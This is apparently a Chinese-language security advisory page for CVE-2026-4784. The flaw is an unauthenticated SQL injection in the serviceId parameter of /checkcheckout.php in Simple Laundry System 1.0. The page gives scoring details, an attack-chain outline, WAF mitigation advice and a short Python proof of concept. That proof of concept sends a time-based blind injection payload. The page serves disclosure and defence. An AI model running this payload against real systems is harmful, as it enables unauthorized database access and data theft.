IPBUF安全漏洞报告
English
CVE-2026-4784 CVSS 7.3 高危

CVE-2026-4784: Simple Laundry System SQL注入漏洞

披露日期: 2026-03-25

漏洞信息

漏洞编号
CVE-2026-4784
漏洞类型
SQL注入
CVSS评分
7.3 高危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
code-projects Simple Laundry System

相关标签

SQL注入Simple Laundry System高危Web安全无需认证

漏洞概述

code-projects Simple Laundry System 1.0版本存在SQL注入漏洞。该漏洞源于/checkcheckout.php文件对serviceId参数处理不当,允许攻击者注入恶意SQL语句。由于无需用户认证且攻击向量为网络,远程攻击者可利用此漏洞窃取敏感数据。

技术细节

该漏洞位于Simple Laundry System 1.0的/checkcheckout.php接口中。系统在处理HTTP请求时,未对传入的serviceId参数进行严格的输入验证和转义,导致攻击者可以将特殊构造的SQL片段拼接到后端数据库查询语句中。利用CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L的攻击特性,攻击者无需任何权限即可远程发起盲注或联合查询攻击,从而绕过认证获取数据库内容,甚至破坏数据完整性。

攻击链分析

STEP 1
侦察
攻击者扫描网络,识别运行Simple Laundry System 1.0的目标服务器。
STEP 2
武器化
攻击者构造针对serviceId参数的恶意SQL注入Payload。
STEP 3
交付
攻击者向目标服务器/checkcheckout.php发送包含恶意Payload的HTTP请求。
STEP 4
利用
后端数据库执行注入的SQL语句,返回敏感信息或执行非预期操作。
STEP 5
达成目标
攻击者成功获取数据库权限,窃取数据或破坏系统完整性。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests def verify_sqli(url): target = f"{url}/checkcheckout.php" # Testing payload to trigger time-based delay payload = "1' AND (SELECT * FROM (SELECT(SLEEP(5)))a)-- -" params = {"serviceId": payload} try: print(f"[+] Sending payload to {target}") response = requests.get(target, params=params, timeout=10) if response.elapsed.total_seconds() >= 5: print("[+] Vulnerability Detected: SQL Injection in serviceId") else: print("[-] Vulnerability not detected") except Exception as e: print(f"Error: {e}") if __name__ == "__main__": target_ip = "http://127.0.0.1" verify_sqli(target_ip)

影响范围

code-projects Simple Laundry System 1.0

防御指南

临时缓解措施
在未升级修复前,建议在网络边界部署Web应用防火墙(WAF),拦截包含SQL注入特征的请求(如单引号、union select、sleep等关键字),并暂时关闭非必要的对外服务接口。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表